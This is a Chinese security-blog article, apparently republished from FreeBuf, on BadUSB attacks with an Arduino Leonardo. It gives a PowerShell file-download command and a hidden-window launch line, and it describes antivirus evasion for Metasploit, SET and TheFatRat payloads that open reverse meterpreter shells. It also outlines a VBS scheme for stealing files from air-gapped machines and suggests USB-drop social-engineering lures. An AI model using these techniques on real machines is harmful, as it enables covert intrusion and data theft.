专栏首页FreeBuf基于ArduinoLeonardo板子的BadUSB攻击实战

基于ArduinoLeonardo板子的BadUSB攻击实战

前言

在Freebuf上许多同学已经对HID攻击谈了自己的看法,如维克斯同学的《利用Arduino快速制作Teensy BadUSB》无论从科普还是实践都给我们详尽的描述了BadUSB制作的相关过程,lpcdma同学的《使用arduino进行渗透测试》则通过SET与Arduino的结合进行渗透,mrzcpo同学的 《HID高级攻击姿势:利用PowerShell脚本进行文件窃取》则介绍了获取文件的详细步骤,我在学习领悟之后想到了一些改进方案,比如绕过360主动防御,隐藏攻击行为,payload免杀,针对不联网设备攻击等,现分享如下,如有不足之处还请大佬指教。

(为贴近实战在某宝上买了个带外壳的Leonardo:P)

1 、绕过360主动防御

输入Powershell命令

powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://127.0.0.1/PUTTY.EXE';$file = ' D:\\x.exe ';$clnt.DownloadFile($url,$file);

这个命令的意思大体是从服务器(这里是本地web服务器)下载EXE到D盘上,但是直接输入360会弹框:

这显然会引起用户注意:-O,而在之前文章中并未提及,可能是在未装杀软的虚拟机中运行的。因为此处不可以通过操控键盘,用先按左键,再按回车的方法实现“允许程序运行”,想到用模拟鼠标的操作完成两次点击,然而比较难以操控,后发现可以通过分步完成绕过:P

注意在实际操作中不要把文件下载到C盘中,那样还需要一个管理员权限,比较麻烦。

2、最大化隐蔽操作

在调出运行窗口后输入

cmd /c start /min powershell -w hidden

/c标明执行玩/c后面的语句后关闭cmd窗口,就不会弹出一个黑框来吓人了,start /min是最小化窗口运行命令,可以避免弹出powershell的蓝框,-w hidden是让powershell以隐蔽的模式运行,此时仍可以输入命令,但不会出现对话框,这样就可以让命令运行尽可能的隐蔽了:P

当然是为了装个小X,做演示的话就可以先不管这些了,不过从实战角度出发,还是低调为妙:P

3、免杀Payload

在完成了文件下载之后我们就思考如何拿到shell,此时有两种方式:

3.1)对msf攻击负荷的免杀处理

在Kali2.0里面msfpayload和msfencode合二为一成为了msfvenom(venom:毒液(⊙o⊙))

-p指定负荷类型,后面是参数,-f指定输出格式,-x指定自义定的模板,这里用Putty.exe,-e指定编码格式,-i指定编码次数,-o指定输出位置(msfvenom可能由于集成了两个功能,导致不能多重编码||=_=)

再用upx进行加壳处理,-9指定以最高等级加壳,最低为1

然而还是被干掉了(;′⌒`)但即使用BT5里面带的msfencode进行多次编码也只能过部分杀软,而且一旦木马被收录360云端就永久失效了,我们找一种现在看起来更好的方法:P

3.2)SET工具集中的Powershell攻击向量

直接下载msf生成的Payload即使花式编码也难免被高启发、云查杀、沙箱检测等手段干掉,所以通过强大的Powershell来建立反向连接是不错的选择,然而在SET工具包中Arduion-Based Attack Vector还针对的是Teensy,并不能直接在Leonardo上使用,故需通过SET中Powershell Attack Vector来实现目的

然后会打开一个MSF的Reverse_TCP Listener

此时只需要在靶机上运行SET生成的Payload即可(初始生成的是txt,后缀改为bat即可)可以看到打开了一个meterpreter连接:P

3.3)TheFatRat

Screetsec组织新出了一个TheFatRat,可以生成免杀的Payload,也是使用的Powershell+bat进行攻击我们来看一下效果:P生成步骤:

生成的test.bat可以过360

同时还能过大多数AV(只有一家报了毒):P

成功打开meterpreter会话:P

尝试后发现[2]Create exe file with c# + Powershell产生的exe文件会在一会后报毒,也许可以用,但还是会引起被控者警觉,看来Powershell,bat这样Windows组件好啊,作为系统组件不可能被查杀;文件小巧而又有底层支持,从而功能强大;驱动脚本非PE从而难以以静态方法查杀;而且大多数Windows电脑并没有禁用Powershell,故成为当今病毒界大红大紫的人物:P

4、针对不联网设备攻击

我们知道许多机密场合计算机都是不联网的,对此我们只能通过USB带出资料,而可惜的是现有BadUSB设备并无存储功能-_-||(也许可以订制),所以只能通过摆渡攻击实现,第一次导入代码自动搜索想要的文件,打包压缩,并在检测到有U盘插入时将文件传入U盘,此VBS代码在后台运行,等待时机,先用Arduino Leanardo传入代码,再用另一个U盘取出文件。

vbs代码实现如下,主要功能是通过模糊查询找到想要的文件,放到D:\fn(fileneeded)文件夹下,压缩后删除原文件并等待U盘插入,插入后将fn.rar传入U盘并删除目标电脑中的fn.rar和VBS脚本

不过当今各种杀软对VBS脚本是严防死守,很多正常功能都报毒,没有高超的VBS免杀技术恐怕是难以完成了。或许可以寄托于不联网的机器松于防备,没装AV…,不过不联网的电脑多半是放绝密信息的,要是你能偷到就可以吃枪子了||+_+。不知道你下辈子还想不想干黑客,如果可能的话十五年后你又是一条好汉:P

结语

在实战中还可以通过仔细选择USB投掷地点,选择或卡哇伊或猥琐的U盘外壳,或在USB上贴上虚构的联系方式,“捡到请归还”等标签增加迷惑性,总之不要低估人类愚蠢的好奇心就好:P

最后的最后,尽管在《超限战》中说道“一切可以帮助人类的东西皆可加害于人类”,但我更想说的是:反之,亦然 !那些伤害人类的东西会让我们变得更加坚强,愿以此文以攻促防,为网络空间的安全添砖加瓦!

本文存在攻击性,请勿用于非法用途,一切责任与本人无关

本文分享自微信公众号 - FreeBuf(freebuf),作者:Professor X

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-04-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 合法练习黑客技术?这15个网站也许可以帮到你

    俗话说得好,最好的防守就是进攻,而这句话同样适用于信息安全领域。接下来,我们将给大家介绍15个最新的网络安全网站。 无论你是开发人员、安全专家、审计人员、或者是...

    FB客服
  • BUF大事件丨谷歌多项服务全球大规模宕机;猎头泄露了数以百万计简历信息

    本周BUF大事件还是为大家带来了新鲜有趣的安全新闻,谷歌多项服务全球大规模宕机:涵盖YouTube、Gmail等;猎头企业泄露了数以百万计的简历,客户私人数据;...

    FB客服
  • RSA大会Keynotes议题Highlight | RSA 2017专题

    RSA Conference 2017(信息安全大会)已于上周在旧金山顺利落幕。作为信息安全行业的年度盛事,本届大会吸引了来自全球的众多顶尖学者和安全厂商。大会...

    FB客服
  • 负二进制加法实现

    N进制,即表示位数可表示范围为 [0, N)(数学表示法,包括首,不包括尾),比如二进制,位数上可用数字只有0或者1,遇2进位,而我们常用的十进制,位数可用数字...

    用户7685359
  • 一个手握安兔兔,一个执掌鲁大师,周鸿祎雷军这场仗谁能赢?

    近日一张互联网大会上周鸿祎和雷军的“亲密照”刷爆互联网,他们两位不仅都是来自荆楚之地的“九头鸟”,更是互联网圈一对冤家。雷军比周鸿祎大一岁,早年周鸿祎在方正集团...

    曾响铃
  • 腾讯云运维干货沙龙-海量运维实践大曝光 (二)

    12月16日,首期沙龙“海量运维实践大曝光”在腾讯大厦圆满举行。沙龙出品人腾讯运维技术总监、复旦大学客座讲师、DevOps专家梁定安,讲师腾讯手机QQ运维负责人...

    织云平台团队
  • 不会修电视机的程序员不是好修理工

    大姑:哦,好吧。。。(此刻心里的想法可能是:这娃肯定是学校成绩不好,没学到东西,在找借口)

    Bruce Li
  • IdentityServer(11)- 使用Hybrid Flow并添加API访问控制

    晓晨
  • arthas命令monitor监控方法执行

    这里面fail的标准是抛出异常,其中rt这个参数比较有意义,可以查看一下方法调用的耗时情况,比如不同参数场景下的方法耗时,这个统计仅供参考。原因下面会讲。

    FunTester
  • Debian开发者商榷在会议上不允许进行问答环节

    Debian 开发者最近一直在讨论一个不太正统的想法 —— 在他们的年度 DebConf 开发者大会上,嘉宾在发表演讲后不允许向其提问,或要求他们回答。据说,这...

    Debian社区

扫码关注云+社区

领取腾讯云代金券